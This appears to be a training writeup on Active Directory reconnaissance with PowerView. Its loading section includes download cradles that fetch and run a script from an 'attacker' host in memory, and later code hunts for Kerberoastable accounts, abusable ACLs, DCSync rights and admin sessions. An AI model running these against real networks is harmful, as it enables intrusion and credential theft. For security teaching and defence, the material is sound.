PowerView Enumeration

intermediate | 35 min | Writeup

Advanced AD enumeration with PowerView

Learning Objectives

  • Use PowerView cmdlets
  • Find interesting ACLs
  • Enumerate trusts
  • Identify attack opportunities

PowerView is the Swiss Army knife of Active Directory enumeration. Written by @harmj0y as part of PowerSploit, it provides PowerShell cmdlets for everything from finding Domain Admins to discovering attack paths. If BloodHound is your map, PowerView is your magnifying glass.

Think of it as a translator between you and Active Directory. Instead of writing complex LDAP queries, you use simple commands like "Get-DomainUser" and PowerView handles the messy details.

PowerView Versions

PowerView has gone through several rewrites. The current version lives in PowerSploit's dev branch (PowerSploit itself is archived and no longer maintained, so that branch is its final state). Most functions were renamed along the way (Get-NetUser → Get-DomainUser, Get-NetDomain → Get-Domain); the dev version keeps the old names as aliases, but we'll use the current naming throughout.

Loading PowerView

```powershell
# Download and import (a download cradle; the request itself is an indicator)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')

# Or from a local copy
Import-Module .\PowerView.ps1

# If the execution policy blocks the import (process scope only, nothing persistent changes)
Set-ExecutionPolicy Bypass -Scope Process
. .\PowerView.ps1

# Check that it loaded
Get-Command -Module PowerView            # only lists functions when loaded with Import-Module
Get-Command Get-DomainUser               # works for both Import-Module and dot-sourcing
Get-DomainUser -Identity Administrator   # test query against the current domain

# In memory without touching disk (AMSI still sees the script text; a bypass may be needed)
# PowerView is a script, not a .NET assembly, so [Reflection.Assembly]::Load() cannot load it:
# fetch the bytes, decode them to text and hand that to Invoke-Expression instead.
$data = (New-Object Net.WebClient).DownloadData('http://attacker/PowerView.ps1')
IEX ([System.Text.Encoding]::UTF8.GetString($data))

# Or stage a base64-encoded copy (hypothetical path on the attacker host) and decode in memory
$b64 = (New-Object Net.WebClient).DownloadString('http://attacker/PowerView.b64')
IEX ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64)))
```

Detection

PowerView is heavily signatured. Defender/AMSI flags the script text as it is loaded, Script Block Logging (Event ID 4104) records the function definitions even when nothing touches disk, and EDRs alert both on the download cradle and on the behaviour itself: bulk LDAP queries from a workstation and NetSessionEnum/NetWkstaUserEnum calls against many hosts in a short window. In red team scenarios consider obfuscation, a compiled equivalent or hand-written LDAP queries, and assume a blue team watching 4104 will see unobfuscated PowerView.

Domain Enumeration

```powershell
# Basic domain information
Get-Domain                        # Current domain
Get-Domain -Domain other.local    # Specific domain

# Domain controllers
Get-DomainController
Get-DomainController -Domain corp.local

# Domain SID
Get-DomainSID

# Domain policy (password policy, etc.); Get-DomainPolicy is an alias for Get-DomainPolicyData
Get-DomainPolicyData
(Get-DomainPolicyData).SystemAccess    # Password and lockout requirements

# Domain trusts
Get-DomainTrust
Get-DomainTrust -Domain corp.local

# Forest information
Get-Forest
Get-ForestDomain    # All domains in the forest
Get-ForestTrust     # Inter-forest trusts
```

User Enumeration

```powershell
# All domain users
Get-DomainUser | Select-Object samaccountname

# Specific user details
Get-DomainUser -Identity administrator
Get-DomainUser -Identity john.doe -Properties *

# Find users with specific attributes
Get-DomainUser -SPN                    # Kerberoastable (servicePrincipalName set)
Get-DomainUser -PreauthNotRequired     # AS-REP Roastable (DONT_REQ_PREAUTH)
Get-DomainUser -AdminCount             # adminCount=1: is, or once was, in a protected group (high value)
Get-DomainUser -TrustedToAuth          # Constrained delegation with protocol transition
Get-DomainUser -UACFilter TRUSTED_FOR_DELEGATION   # Unconstrained delegation
Get-DomainUser -AllowDelegation        # Accounts whose credentials MAY be delegated (NOT_DELEGATED unset);
                                       # this is a property of the victim account, not a delegation setting

# Search descriptions (often contain passwords!)
Get-DomainUser -LDAPFilter "(description=*)" | Select-Object name, description
Get-DomainUser | Where-Object {$_.description -match "pass"}

# Users with SPNs, same set as -SPN but shows the SPN values
Get-DomainUser -Properties samaccountname,serviceprincipalname |
    Where-Object {$_.serviceprincipalname}

# Recently changed passwords (PowerView converts pwdlastset to a DateTime)
$Date = (Get-Date).AddDays(-30)
Get-DomainUser -Properties samaccountname, pwdlastset |
    Where-Object {$_.pwdlastset -gt $Date}

# Logged on users (requires admin on the target)
Get-NetLoggedon -ComputerName workstation01
```

Description Field Gold

Always check the description field. Admins frequently put temporary passwords, hints, or sensitive info there. "temp pass: Summer2024!"

Group Enumeration

```powershell
# All groups
Get-DomainGroup | Select-Object samaccountname

# Specific group
Get-DomainGroup -Identity "Domain Admins"

# Group members
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins" -Recurse    # Expand nested groups

# Groups a user belongs to (uses tokenGroups, so nested membership is included; -UserName is the legacy alias)
Get-DomainGroup -MemberIdentity john.doe

# High-value groups (Enterprise Admins and Schema Admins exist only in the forest root domain)
$groups = @("Domain Admins", "Enterprise Admins", "Administrators",
            "Account Operators", "Backup Operators", "Server Operators",
            "DnsAdmins", "Schema Admins")
foreach ($group in $groups) {
    Write-Host "=== $group ===" -ForegroundColor Yellow
    Get-DomainGroupMember -Identity $group -Recurse |
        Select-Object MemberName, MemberObjectClass
}

# Local group members on machines (SAMR; needs rights on the target)
Get-NetLocalGroupMember -ComputerName DC01
Get-NetLocalGroupMember -ComputerName DC01 -GroupName Administrators

# Machines where the current user has local admin
Find-LocalAdminAccess
# Machines where a specific user has a session (this is session hunting, not admin rights; see Session Enumeration)
Find-DomainUserLocation -UserIdentity john.doe
```

Computer Enumeration

```powershell
# All computers
Get-DomainComputer | Select-Object dnshostname, operatingsystem

# Filter by OS
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -OperatingSystem "*Server 2019*"
Get-DomainComputer -OperatingSystem "*Windows 10*"

# Computers with unconstrained delegation (high value!)
# Domain controllers have this flag by default, so the interesting hits are the non-DCs
Get-DomainComputer -Unconstrained
Get-DomainComputer -TrustedToAuth    # Constrained delegation

# Live machines (ICMP sweep; noisy)
Get-DomainComputer -Ping

# Find machines with a specific service registered as an SPN
Get-DomainComputer -LDAPFilter "(servicePrincipalName=*MSSQL*)"

# Computer details
Get-DomainComputer -Identity DC01 -Properties *
```

Share Enumeration

```powershell
# Shares on a specific machine
Get-NetShare -ComputerName dc.corp.local

# Shares across the domain
Find-DomainShare                     # All shares
Find-DomainShare -CheckShareAccess   # Only shares the current user can read

# Interesting files in shares (the default -Include list already covers *password*, *secret*,
# *creds*, unattend*.xml and *.config, among others)
Find-InterestingDomainShareFile
Find-InterestingDomainShareFile -Include @("*.ps1", "*.config", "*.xml")

# Specific file types
Find-InterestingDomainShareFile -Include "*password*"
Find-InterestingDomainShareFile -Include "*.kdbx"      # KeePass databases
Find-InterestingDomainShareFile -Include "web.config"  # Connection strings
```

GPO Enumeration

```powershell
# All GPOs
Get-DomainGPO | Select-Object displayname, gpcfilesyspath

# GPOs applied to a specific computer
Get-DomainGPO -ComputerIdentity workstation01

# GPOs applied to a specific user
Get-DomainGPO -UserIdentity john.doe

# GPOs whose name hints at scripts (gpcfilesyspath is just \\domain\SysVol\...\Policies\{GUID};
# the actual settings live in the files under that path)
Get-DomainGPO | Where-Object {$_.displayname -match "script"}

# GPO permissions (who can edit?) - GenericAll does not contain "Write", so match it explicitly
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object {$_.ActiveDirectoryRights -match "Write|GenericAll"}

# OUs and the GPOs linked to them
Get-DomainOU | Select-Object name, gplink
```

GPO Attack Paths

If you can edit a GPO, you can push settings to every computer and user it applies to: an immediate scheduled task or startup script that runs as SYSTEM, a Restricted Groups entry that adds you to local Administrators, or a registry change that weakens a host. Check two ACLs, not one: the rights on the GPO object in AD (the query above) and the NTFS rights on its SYSVOL folder (gpcfilesyspath), since either lets you change the policy files. Also look at who can link GPOs to an OU (WriteProperty on gPLink); linking a policy you already control is as good as editing one.
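The check described above, carried through as an added example (not code from the original writeup or from PowerView itself): list GPOs that a non-built-in principal can edit, then follow each one to the containers that link it and the computers underneath. It assumes PowerView (dev) is loaded in a domain-joined session; treating RIDs of 1000 and above as "non-built-in" is a heuristic (500 to 999 are the well-known accounts and groups), and site-level links are deliberately out of scope.

```powershell
function Find-WritableGpo {
    # Rights that let a principal change the policy object or its security descriptor
    $editRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'

    Get-DomainGPO -Properties displayname,name,distinguishedname,gpcfilesyspath | ForEach-Object {
        $gpo = $_
        Get-DomainObjectAcl -Identity $gpo.distinguishedname -ResolveGUIDs |
            Where-Object {
                $_.AceType -match 'AccessAllowed' -and
                $_.ActiveDirectoryRights -match $editRights -and
                # domain SID with a RID >= 1000: skips Domain Admins (512), SYSTEM, Authenticated Users, etc.
                $_.SecurityIdentifier.Value -match '^S-1-5-21-.*-[1-9]\d{3,}$'
            } |
            ForEach-Object {
                [pscustomobject]@{
                    GPO        = $gpo.displayname
                    GpoGuid    = $gpo.name                 # '{GUID}', the value gPLink refers to
                    Principal  = ConvertFrom-SID -ObjectSid $_.SecurityIdentifier.Value
                    Right      = $_.ActiveDirectoryRights
                    SysvolPath = $gpo.gpcfilesyspath       # check the NTFS ACL here as well
                }
            }
    }
}

function Get-GpoTarget {
    param([Parameter(Mandatory)][string]$GpoGuid)
    # Domain head and OUs whose gPLink mentions this GPO; site links live in the
    # configuration partition and are not searched here
    Get-DomainObject -LDAPFilter "(gPLink=*$GpoGuid*)" -Properties distinguishedname,name | ForEach-Object {
        $container = $_
        Get-DomainComputer -SearchBase $container.distinguishedname -Properties dnshostname | ForEach-Object {
            [pscustomobject]@{ Container = $container.name; Computer = $_.dnshostname }
        }
    }
}

# Writable GPOs first, then the machines each one reaches
$writable = Find-WritableGpo
$writable | Format-Table -AutoSize
$writable | Select-Object -ExpandProperty GpoGuid -Unique | ForEach-Object { Get-GpoTarget -GpoGuid $_ }
```

A hit where Principal is an ordinary user or a helpdesk group, and the GPO reaches servers or admin workstations, is the path worth reporting; a hit where the principal is the GPO's own creator is normal and usually not interesting.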

ACL Enumeration

```powershell
# ACLs on a specific object
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Interesting ACLs held by non-default principals (RID >= 1000) across the domain
Find-InterestingDomainAcl -ResolveGUIDs

# ACLs where a specific principal has rights (replace the placeholder with the real SID)
Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object {$_.SecurityIdentifier -match "S-1-5-21-...-1001"}

# Look for GenericAll, WriteDacl, WriteOwner, etc. on a target
Get-DomainObjectAcl -Identity john.doe -ResolveGUIDs |
    Where-Object {$_.ActiveDirectoryRights -match "GenericAll|WriteDacl|WriteOwner"}

# Objects the current user's own SID has rights on (without -Identity this walks every object; slow)
$sid = Get-DomainUser -Identity $env:USERNAME | Select-Object -ExpandProperty objectsid
Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object {$_.SecurityIdentifier.Value -eq $sid}
```
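Matching on the user's own SID misses the common case, where the dangerous right is granted to a group the user sits in (often several levels deep). The following is an added example, not part of the original writeup or of PowerView: it collects every SID the current user carries (own SID, nested groups via tokenGroups, and the well-known SIDs every domain user holds) and filters the domain's ACEs against that whole set. It assumes PowerView (dev) is loaded and that the session runs as a domain user; the list of "dangerous" rights is the editor's choice.

```powershell
function Get-CurrentUserSid {
    # The user's own SID (PowerView returns objectsid as an SDDL string)
    $user = Get-DomainUser -Identity $env:USERNAME -Properties objectsid
    $sids = @($user.objectsid)
    # Every group in the user's token, nested membership included (-MemberIdentity uses tokenGroups)
    $sids += Get-DomainGroup -MemberIdentity $env:USERNAME -Properties objectsid |
        Select-Object -ExpandProperty objectsid
    # Well-known SIDs present in every domain user's token
    $sids += 'S-1-1-0'                    # Everyone
    $sids += 'S-1-5-11'                   # Authenticated Users
    $sids += "$(Get-DomainSID)-513"       # Domain Users
    $sids | Where-Object { $_ } | Sort-Object -Unique
}

function Find-AbusableAcl {
    param([Parameter(Mandatory)][string[]]$Sids)
    # Rights that translate into control of the target object (assumption: this list is the
    # editor's, not PowerView's; ExtendedRight covers e.g. User-Force-Change-Password)
    $dangerous = 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty|ExtendedRight|Self'

    # No -Identity: every object in the domain is walked, so expect this to take a while
    Get-DomainObjectAcl -ResolveGUIDs |
        Where-Object {
            $_.AceType -match 'AccessAllowed' -and
            $Sids -contains $_.SecurityIdentifier.Value -and
            $_.ActiveDirectoryRights -match $dangerous
        } |
        ForEach-Object {
            [pscustomobject]@{
                Target        = $_.ObjectDN
                Right         = $_.ActiveDirectoryRights
                ExtendedRight = $_.ObjectAceType        # resolved name when -ResolveGUIDs is used
                GrantedTo     = ConvertFrom-SID -ObjectSid $_.SecurityIdentifier.Value
            }
        }
}

Find-AbusableAcl -Sids (Get-CurrentUserSid) | Format-Table -AutoSize
```

Compared with Find-InterestingDomainAcl, which reports every non-default principal in the domain, this narrows the output to rights you can exercise from the current token. Rights granted through Everyone or Authenticated Users show up too, which is exactly the misconfiguration you want to catch.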

Session Enumeration

```powershell
# Where is a user logged in?
Find-DomainUserLocation -UserIdentity administrator

# Who's logged into a machine? (NetWkstaUserEnum; requires admin on the target)
Get-NetLoggedon -ComputerName workstation01

# Active SMB sessions (NetSessionEnum); on hardened hosts (NetCease, or recent Windows defaults)
# this returns nothing without admin rights on the target
Get-NetSession -ComputerName dc01

# Find where Domain Admins are logged in (the default group, spelled out here)
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"

# Hunt a specific user and test local admin access on each host where a session is found
Find-DomainUserLocation -UserIdentity targetuser -CheckAccess
```

Session Hunting

Finding where admins are logged in tells you which hosts to go after for credential theft. If a Domain Admin has an interactive session on workstation01 and you get local admin there, that account's credentials or Kerberos tickets are sitting in LSASS on that machine. Find-DomainUserLocation -CheckAccess answers both questions in one pass: where the session is, and whether you already have admin on that host.

Finding Attack Paths

```powershell
# Kerberoastable users (especially privileged ones)
Get-DomainUser -SPN -AdminCount |
    Select-Object samaccountname, serviceprincipalname, memberof

# AS-REP Roastable users
Get-DomainUser -PreauthNotRequired

# Unconstrained delegation (TGT theft)
Get-DomainComputer -Unconstrained
Get-DomainUser -UACFilter TRUSTED_FOR_DELEGATION

# Constrained delegation (service impersonation)
Get-DomainComputer -TrustedToAuth |
    Select-Object samaccountname, msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth |
    Select-Object samaccountname, msds-allowedtodelegateto

# Principals with replication (DCSync) rights on the domain head
# A full DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All (or GenericAll)
Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -SearchScope Base -ResolveGUIDs |
    Where-Object {($_.ActiveDirectoryRights -match 'GenericAll') -or
                  ($_.ObjectAceType -match 'DS-Replication-Get-Changes')}

# Exchange Windows Permissions: historically holds WriteDacl on the domain object,
# which lets a member grant themselves the replication rights above
Get-DomainGroupMember -Identity "Exchange Windows Permissions"
```
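The DCSync filter above lists individual ACEs, so a principal that holds Get-Changes but not Get-Changes-All looks the same as one that holds both. The following added example (not from the original writeup or from PowerView) groups the ACEs on the domain head per principal and reports only those that can actually replicate: GenericAll, an unscoped ExtendedRight, or both replication rights together. It assumes PowerView (dev) is loaded; the domain defaults to the one the session is joined to, and the list of "expected" holders is the editor's.

```powershell
function Find-DCSyncPrincipal {
    param([string]$Domain = (Get-Domain).Name)

    # corp.local -> DC=corp,DC=local
    $domainDN = 'DC=' + (($Domain -split '\.') -join ',DC=')

    # Principals that legitimately hold replication rights: Domain Admins (512), Domain Controllers (516),
    # Enterprise Admins (519; carries the forest-root SID in child domains), BUILTIN\Administrators,
    # Enterprise Domain Controllers and SYSTEM. Anything else is worth a look.
    $expected = '^S-1-5-(9|18|32-544)$|-(512|516|519)$'

    $aces = Get-DomainObjectAcl -Domain $Domain -SearchBase $domainDN -SearchScope Base -ResolveGUIDs |
        Where-Object { $_.AceType -match 'AccessAllowed' }

    $aces | Group-Object -Property { $_.SecurityIdentifier.Value } | ForEach-Object {
        $sid = $_.Name
        $g   = $_.Group

        $genericAll    = $g | Where-Object { $_.ActiveDirectoryRights -match 'GenericAll' }
        # A non-object ACE with the ExtendedRight bit grants every extended right, replication included
        $allExtended   = $g | Where-Object { $_.AceType -eq 'AccessAllowed' -and
                                             $_.ActiveDirectoryRights -match 'ExtendedRight' }
        $getChanges    = $g | Where-Object { $_.ObjectAceType -eq 'DS-Replication-Get-Changes' }
        $getChangesAll = $g | Where-Object { $_.ObjectAceType -eq 'DS-Replication-Get-Changes-All' }

        $via = if ($genericAll) { 'GenericAll' }
               elseif ($allExtended) { 'ExtendedRight (unscoped)' }
               elseif ($getChanges -and $getChangesAll) { 'Get-Changes + Get-Changes-All' }

        if ($via) {
            [pscustomobject]@{
                Principal = ConvertFrom-SID -ObjectSid $sid -Domain $Domain
                SID       = $sid
                Via       = $via
                Expected  = [bool]($sid -match $expected)
            }
        }
    }
}

# Rows with Expected = False are the DCSync paths to investigate
Find-DCSyncPrincipal | Sort-Object Expected | Format-Table -AutoSize
```

Expected = True only means the holder is one of the built-in groups; a user added to Domain Admins still shows up through Get-DomainGroupMember, not here. Conversely, a principal with only one of the two replication rights is omitted on purpose, because it cannot pull secrets on its own.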

PowerView Cheatsheet

```
Essential Commands:
├── Domain Info
│   ├── Get-Domain
│   ├── Get-DomainController
│   └── Get-DomainTrust
├── Users
│   ├── Get-DomainUser
│   ├── Get-DomainUser -SPN (Kerberoast targets)
│   └── Get-DomainUser -PreauthNotRequired (AS-REP targets)
├── Groups
│   ├── Get-DomainGroup
│   ├── Get-DomainGroupMember -Recurse
│   └── Find-LocalAdminAccess
├── Computers
│   ├── Get-DomainComputer
│   ├── Get-DomainComputer -Unconstrained
│   └── Get-NetLoggedon
├── Shares
│   ├── Find-DomainShare
│   └── Find-InterestingDomainShareFile
├── ACLs
│   ├── Get-DomainObjectAcl
│   └── Find-InterestingDomainAcl
└── Sessions
    ├── Find-DomainUserLocation
    └── Get-NetSession
```

PowerView Methodology

Systematic Enumeration

1. Domain Info: Get-Domain, Get-DomainTrust, Get-DomainController
2. High-Value Users: Domain Admins, AdminCount users, SPNs
3. Attack Targets: Kerberoastable, AS-REP roastable, delegations
4. Session Hunting: Find where admins are logged in
5. ACL Abuse: Find writable objects for privilege escalation
6. Shares: Search for credentials in accessible shares

Knowledge Check


Which PowerView command finds Kerberoastable accounts?

Challenges

Complete Domain Recon


Using PowerView, create a comprehensive enumeration report including: all Domain Admins, Kerberoastable accounts with admin privileges, and machines with unconstrained delegation.


Key Takeaways

  • PowerView simplifies AD enumeration with PowerShell cmdlets
  • Get-DomainUser -SPN finds Kerberoastable accounts
  • Get-DomainUser -PreauthNotRequired finds AS-REP roastable accounts
  • Find-DomainUserLocation reveals where admins are logged in
  • Always check description fields for credentials
  • Find-InterestingDomainAcl discovers privilege escalation paths